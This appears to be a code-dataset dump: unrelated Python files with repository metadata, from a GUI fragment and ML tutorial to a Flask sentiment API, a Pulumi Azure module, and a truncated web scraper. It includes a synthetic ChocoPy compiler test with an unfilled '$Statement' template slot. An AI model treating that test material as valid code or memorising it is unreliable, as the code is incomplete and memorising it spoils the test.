self.replace_line("config_zeiss.py",18, ''.join(["zaberport=\"",self.zaberport_str,"\"\n"]) )
self.replace_line("config_zeiss.py",19, ''.join(["sr510port=\"",self.sr510port_str,"\"\n"]) )
self.lcd3.display(self.timestr)
imp.reload(config_zeiss)
def replace_line(self,file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
def main():
app=QtGui.QApplication(sys.argv)
ex=Run_gui()
#sys.exit(app.exec_())
# avoid message 'Segmentation fault (core dumped)' with app.deleteLater()
app.exec_()
app.deleteLater()
sys.exit()
if __name__=='__main__':
main()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
5ed6ab127cba5918dd12490bf579baafac9dc250 | 1fa262359f91768f1b98c45944fd4a63645f4567 | /variable_examples.py | 03bd0c75fcb7f7afb46ffb09f440a337d5d26ae4 | [] | no_license | feleHaile/20190225KAPL | d1a95dd6632ba83b6cd3380d92e2a2a18a5a4942 | 3957c1d738cc3e42d5dac0fb4a6f6071a1bb391a | refs/heads/master | 2020-05-15T22:31:51.881632 | 2019-02-28T20:11:29 | 2019-02-28T20:11:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | #!/usr/bin/env python
x = 5
print(x)
y = x
things = [1, 2, 3]
t = things
print(t)
t.append(42)
print(things)
print(t is things)
print(id(t), id(things))
print(type(x), type(t), type(type), type('spam'))
t = 42
print(type(t))
t = "amazon"
print(type(t))
m = None
print(m)
| [
"jstrickler@gmail.com"
] | jstrickler@gmail.com |
3ae000d112d57efb42e387fa72728765b02c3bdd | 3bb79d8362510e56102fdac19db394c29f367ca2 | /pytensor/tutorial/part1/linear.py | 2194cc9a749cc2ef0369a34de6f6a5f5c888cd99 | [
"MIT"
] | permissive | shuida/pytensor | 94225d37fad02bda5d9724443c15a055f9b1cc13 | d00d188dcc2da12d43afa749b3b23dd27e42698d | refs/heads/master | 2020-04-15T20:53:23.951523 | 2018-04-19T01:37:17 | 2018-04-19T01:37:17 | 165,011,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,435 | py | from pytensor.ops.math_ops import *
from pytensor.ops.loss_ops import *
from pytensor.tutorial.part1.trainer import *
from sklearn.datasets import load_digits
from sklearn.model_selection import train_test_split
class LinearModel:
def __init__(self, input_size, output_size):
"""
a simple linear model: y = w*x
:param input_size:
:param output_size:
"""
# initialize size
self.input_size = input_size
self.output_size = output_size
# initialize parameters
self.parameter = Parameter()
self.W = self.parameter.get_variable('weight', [self.input_size, self.output_size])
# ops and loss
self.matmul = Matmul()
self.loss_ops = SoftmaxLoss()
def forward(self, input_variable):
output_variable = self.matmul.forward([input_variable, self.W])
self.loss_ops.forward(output_variable)
return output_variable
def loss(self, target_variable):
loss_val = self.loss_ops.loss(target_variable)
return loss_val
def backward(self):
self.loss_ops.backward()
self.matmul.backward()
if __name__ == '__main__':
digits = load_digits()
digits.data /= 16.0
x_train, x_test, y_train, y_test = train_test_split(digits.data, digits.target)
model = LinearModel(64, 10)
trainer = Trainer(model)
trainer.train(x_train, y_train, x_test, y_test) | [
"lixinjian1217@gmail.com"
] | lixinjian1217@gmail.com |
dfc536d6b9c2abe4658a89ae31ea382458fc2581 | ff1e70a47a5adfb34b9ba75a41298623844b7b85 | /bookingsapp/serializers.py | 56f42aef3f92044ef4d971bd8dbe42b197cc0b9e | [] | no_license | guptais/django-rest-api | 636307c97d2e2ff3fe44e5eeb16a0fd7e381ece7 | d271f7ff8005d47e1a1da2c1a809d22605c576e5 | refs/heads/master | 2023-03-07T22:37:47.838503 | 2021-02-20T09:28:53 | 2021-02-20T09:28:53 | 340,613,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from rest_framework import serializers
from .models import BookingModel, RoomModel
class BookingSerializer(serializers.ModelSerializer):
class Meta:
model = BookingModel
fields = ['id', 'from_Date', 'to_date', 'number_of_rooms', 'price']
| [
"15913179+guptaisha5484@users.noreply.github.com"
] | 15913179+guptaisha5484@users.noreply.github.com |
a8cfde36a731a0cfeb460159e2cc73d43db7c46e | 101d866f8e2f84dc8f76181341180c13b38e0ecf | /case/Demo/test_global_init.py | 96c3320be20e782b490bbf14bbb0cf12cef8b2c5 | [] | no_license | cming091/autotest | 1d9a6f5f750c04b043a6bc45efa423f2e730b3aa | 0f6fe31a27de9bcf0697c28574b97555fe36d1e1 | refs/heads/master | 2023-06-02T18:22:24.971786 | 2021-06-21T08:52:47 | 2021-06-21T08:52:47 | 378,858,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # coding=utf-8
import pytest
import allure
from case.base import TestBase
@allure.feature('测试初始化全局数据')
@allure.link(url="https://pages/viewpage.action?pageId=84191585", name="测试用例")
@pytest.mark.usefixtures("init_module_data")
@pytest.mark.usefixtures("init_global_data")
class TestGlobalDataInit(TestBase):
"""test global data init"""
@allure.story("1.第一步")
def test_step_one(self, request):
print('test step one...done')
def test_step_two(self, request):
print('test step two...done')
assert 1 == 2
def test_step_three(self, request):
print('test step three... done')
| [
"349152234@qq.com"
] | 349152234@qq.com |
4cc1d2f8e739cec0560cfb768c14d5dc62a9a459 | 87f59e1f3db5598c2caebe80a78c2c4ca29ab0f9 | /bg_simulation/card/__init__.py | 74372617fac58065bf31558f3928be44ff5af27c | [] | no_license | kdchoi-mkt/battleground-simulation | 71477fadc7efd684c212b21fc91a53628b20a131 | 79251a8a345c989b41380b39aa2623c75ec67d16 | refs/heads/master | 2023-08-04T17:08:47.399102 | 2021-09-05T09:41:16 | 2021-09-05T09:41:16 | 403,029,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | from .Card import Card
| [
"kdchoi_mkt@kaist.ac.kr"
] | kdchoi_mkt@kaist.ac.kr |
de0b0b059a80c07749a16ea129918524290a5f28 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/David.Liu/q3.py | a26e4881ffe0696d7c67a6a0d0631ed73764fc4d | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 866 | py | import math
n=32
x=500
outf=open("q3large.out","w")
def factor(num):
r=500
for i in range(2, r):
if num%i==0:
return i
return -1
def makelist(n):
lst=[]
l=len(n)
for i in range(2, 11):
num=0
for j in range(0, l):
num+=int(n[j])*(i**(l-1-j))
fac=factor(num)
if fac==-1:
break;
lst.append(fac)
return lst
def f(n, k):
if n==0:
l=makelist(k+"1")
if len(l)==9:
outf.write(k+"1")
for p in l:
outf.write(" "+str(p))
outf.write("\n")
global x
x=x-1
print(x)
if x==0:
outf.close()
exit()
else:
f(n-1, k+"0")
f(n-1, k+"1")
f(n-2, "1") | [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
633a614ee0db510056cd958a7c80c9535fcae420 | fbf77a57d68060c60fe8e39a85ed541768b041a2 | /rest/mydjangoenv/lib/python3.7/functools.py | aad2d84cc0aae30011bd764df4d6c354c9d6b546 | [] | no_license | shlokagarwal/kharche | c4e78dc47f96c796b9d8960b659ac548ee3c8305 | 12d24e4bdea5ed2adabdb082397a516017e6cb2d | refs/heads/master | 2020-09-14T13:16:47.284264 | 2019-11-22T11:13:09 | 2019-11-22T11:13:09 | 223,136,552 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/shlokagarwalla/anaconda3/lib/python3.7/functools.py | [
"skagarwal.usa@gmail.com"
] | skagarwal.usa@gmail.com |
091f1500145668ea72376cd73fea7d27b8c05ab9 | 71c395d3bc7935198ff7063593b215fc07d68912 | /N_Tiles/Frontier.py | b49883ac09d4f21ee7bdd82683598edb1cd5466a | [] | no_license | tico2303/AI | eacc13917530864d604cb73f4635f994caa9bed5 | 19d8591e9ce4757f754c959ac9c5a1e7f5df25ef | refs/heads/master | 2020-05-23T08:01:01.960184 | 2017-03-02T20:02:20 | 2017-03-02T20:02:20 | 80,486,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import bisect
class Frontier(object):
def __init__(self):
self.q = []
def is_empty(self):
pass
def pop(self):
pass
def push(self):
pass
class PriorityQue(Frontier):
def __iter__(self):
for el in self.q:
yield el
def find_element(self, el):
for i in self.q:
if i == el:
return i
else:
return None
def index(self, el):
return self.q.index(el)
def __getitem__(self, index):
return self.q[index]
def __setitem__(self, index, value):
self.q[index] = value
def __len__(self):
return len(self.q)
def __contains__(self, key):
return key in self.q
def is_empty(self):
if self.q:
return False
else:
return True
def pop(self):
return self.q.pop(0)
def push(self, node):
#places node in shorted order
# reduces time complexity to O(logn) in
# average case
bisect.insort(self.q, node)
def front(self):
"""just peek at front"""
return self.q[0]
| [
"tico82003@gmail.com"
] | tico82003@gmail.com |
c57d2a70d066ddda6610a3b4c293c98a939d45c0 | 217a2bf11f99ebab761037ca3362d7d637d15093 | /Sentiment-Analyzer/appV(0.1).py | e2d0ff756be7ea28731094b95fe6beb760ab279f | [] | no_license | SiddhantPamnani/Machine-Learning | 3e4af8c20ffbff6324ed4e0c9968b10298f4bf50 | 75222b542ec9e480336f7044520bc653227f1b09 | refs/heads/main | 2023-04-18T12:26:23.557902 | 2021-04-19T12:59:18 | 2021-04-19T12:59:18 | 359,431,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,911 | py | from flask import Flask,request, jsonify
import json
from flask_cors import CORS, cross_origin
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import sequence
import json
import warnings
import pickle
app = Flask(__name__)
CORS(app)
cors = CORS(app, resources={
r"/*": {
"origins": "*"
}
})
@app.route('/post/', methods=['POST'])
@cross_origin()
def post_something():
if request.method == 'POST':
data = request.json['data']
print("Data::",data)
print("Loading Model")
model = load_model('tweet_model2.h5')
print("LOADING TOKENIZER")
with open('tweet_tokenizer2.pickle', 'rb') as f:
tokenizer = pickle.load(f)
'''
with open('ranked_vocab.json') as f:
ranked_vocab = json.load(f)
final_vector=[]
for i in data.split():
i = i.lower()
if i in ranked_vocab:
final_vector.append(ranked_vocab[i])
else:
final_vector.append(0)
max_review_length = 600
final_vector = sequence.pad_sequences([final_vector], maxlen=max_review_length)
'''
sequences = tokenizer.texts_to_sequences([data])
print("LEN_SEQ::",len(sequences))
data = pad_sequences(sequences, maxlen=50)
print("LEN_DATA::",len(data))
prob = model.predict(data)
print("PROBABILITY::",prob)
if prob[0][0] > 0.5:
sentiment = "Positive"
proba = prob[0][0]
else:
sentiment = "Negative"
proba = 1 - prob[0][0]
response = {'sentiment':sentiment, 'proba':str(proba)}
response = jsonify(response)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
| [
"sidpspotter@gmail.com"
] | sidpspotter@gmail.com |
eb5b33dc0fc012d521bf71c982068b71534887b6 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/sql/get_database_vulnerability_assessment.py | a6aa84ede40a8f73706d9941a81575ccf9b1a66e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,722 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetDatabaseVulnerabilityAssessmentResult',
'AwaitableGetDatabaseVulnerabilityAssessmentResult',
'get_database_vulnerability_assessment',
]
@pulumi.output_type
class GetDatabaseVulnerabilityAssessmentResult:
"""
A database vulnerability assessment.
"""
def __init__(__self__, id=None, name=None, recurring_scans=None, storage_account_access_key=None, storage_container_path=None, storage_container_sas_key=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if recurring_scans and not isinstance(recurring_scans, dict):
raise TypeError("Expected argument 'recurring_scans' to be a dict")
pulumi.set(__self__, "recurring_scans", recurring_scans)
if storage_account_access_key and not isinstance(storage_account_access_key, str):
raise TypeError("Expected argument 'storage_account_access_key' to be a str")
pulumi.set(__self__, "storage_account_access_key", storage_account_access_key)
if storage_container_path and not isinstance(storage_container_path, str):
raise TypeError("Expected argument 'storage_container_path' to be a str")
pulumi.set(__self__, "storage_container_path", storage_container_path)
if storage_container_sas_key and not isinstance(storage_container_sas_key, str):
raise TypeError("Expected argument 'storage_container_sas_key' to be a str")
pulumi.set(__self__, "storage_container_sas_key", storage_container_sas_key)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="recurringScans")
def recurring_scans(self) -> Optional['outputs.VulnerabilityAssessmentRecurringScansPropertiesResponse']:
"""
The recurring scans settings
"""
return pulumi.get(self, "recurring_scans")
@property
@pulumi.getter(name="storageAccountAccessKey")
def storage_account_access_key(self) -> Optional[str]:
"""
Specifies the identifier key of the storage account for vulnerability assessment scan results. If 'StorageContainerSasKey' isn't specified, storageAccountAccessKey is required.
"""
return pulumi.get(self, "storage_account_access_key")
@property
@pulumi.getter(name="storageContainerPath")
def storage_container_path(self) -> Optional[str]:
"""
A blob storage container path to hold the scan results (e.g. https://myStorage.blob.core.windows.net/VaScans/). It is required if server level vulnerability assessment policy doesn't set
"""
return pulumi.get(self, "storage_container_path")
@property
@pulumi.getter(name="storageContainerSasKey")
def storage_container_sas_key(self) -> Optional[str]:
"""
A shared access signature (SAS Key) that has write access to the blob container specified in 'storageContainerPath' parameter. If 'storageAccountAccessKey' isn't specified, StorageContainerSasKey is required.
"""
return pulumi.get(self, "storage_container_sas_key")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetDatabaseVulnerabilityAssessmentResult(GetDatabaseVulnerabilityAssessmentResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDatabaseVulnerabilityAssessmentResult(
id=self.id,
name=self.name,
recurring_scans=self.recurring_scans,
storage_account_access_key=self.storage_account_access_key,
storage_container_path=self.storage_container_path,
storage_container_sas_key=self.storage_container_sas_key,
type=self.type)
def get_database_vulnerability_assessment(database_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
vulnerability_assessment_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDatabaseVulnerabilityAssessmentResult:
"""
A database vulnerability assessment.
API Version: 2020-08-01-preview.
:param str database_name: The name of the database for which the vulnerability assessment is defined.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
:param str vulnerability_assessment_name: The name of the vulnerability assessment.
"""
__args__ = dict()
__args__['databaseName'] = database_name
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
__args__['vulnerabilityAssessmentName'] = vulnerability_assessment_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:sql:getDatabaseVulnerabilityAssessment', __args__, opts=opts, typ=GetDatabaseVulnerabilityAssessmentResult).value
return AwaitableGetDatabaseVulnerabilityAssessmentResult(
id=__ret__.id,
name=__ret__.name,
recurring_scans=__ret__.recurring_scans,
storage_account_access_key=__ret__.storage_account_access_key,
storage_container_path=__ret__.storage_container_path,
storage_container_sas_key=__ret__.storage_container_sas_key,
type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
b6ecbef1faf3aab95571a56f1eaf1dece622f4c0 | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_org_apache_sling_distribution_monitor_distribution_queue_health_check_properties.py | 78c34d346fd02e2be860bd78e70e6726077ba3fc | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,475 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.org_apache_sling_distribution_monitor_distribution_queue_health_check_properties import OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestOrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties(unittest.TestCase):
"""OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties(self):
"""Test OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.org_apache_sling_distribution_monitor_distribution_queue_health_check_properties.OrgApacheSlingDistributionMonitorDistributionQueueHealthCheckProperties() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
57145b59e685e5f01020f461aa0f8d6d30d4aaa9 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/coverage-big-2414.py | 3053991009fd4d98c0485cb6eb9c680b4184c3a6 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,337 | py | count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
$Statement
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
fdbb36745f19746d6ff0a8f244352c704a20cad2 | 263ee801e27eeeee336e32a7e1382fa7909fe2ad | /app/pic_spider/video.py | fde6bcb2e4843984f106f466c9fbb278a72c2763 | [] | no_license | GitOfx/app_server | 29547006ab390c4eddb0d9c47f774d7f1bdffcf9 | 59266e6a12fca1b3a166e4323cc72ea6309dbf7d | refs/heads/master | 2021-09-05T16:17:53.060637 | 2018-01-29T14:58:16 | 2018-01-29T14:58:16 | 119,249,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,778 | py | from multiprocessing import Process, Queue
from multiprocessing import Pool
from bs4 import BeautifulSoup
from app.pic_spider import request_url,save_pic
import asyncio
import urllib3
import os,time
from selenium import webdriver
# https://seleniumhq.github.io/selenium/docs/api/py/index.html
host = 'http://91.91p10.space/v.php?next=watch'
# host = 'http://93.91p12.space/v.php?category=long&viewtype=basic'
request_quen = Queue()
async def start():
html =await request_url.request(host,decode=False, fr="index")
# brower = webdriver.Chrome();
# brower.get(host)
# time.sleep(3);
# html = brower.page_source;
if html != None:
await prase_index(html)
async def prase_index(html):
soup = BeautifulSoup(html, "html.parser")
tags = soup.find_all("div", class_="listchannel")
for div in tags:
a = div.find('a')
url = a['href']
title = a.find('img')['title']
print(title+" url "+url)
html = await request_url.request(url, fr="page")
if html != None:
await prase_page(html)
async def prase_page(html):
# print(html)
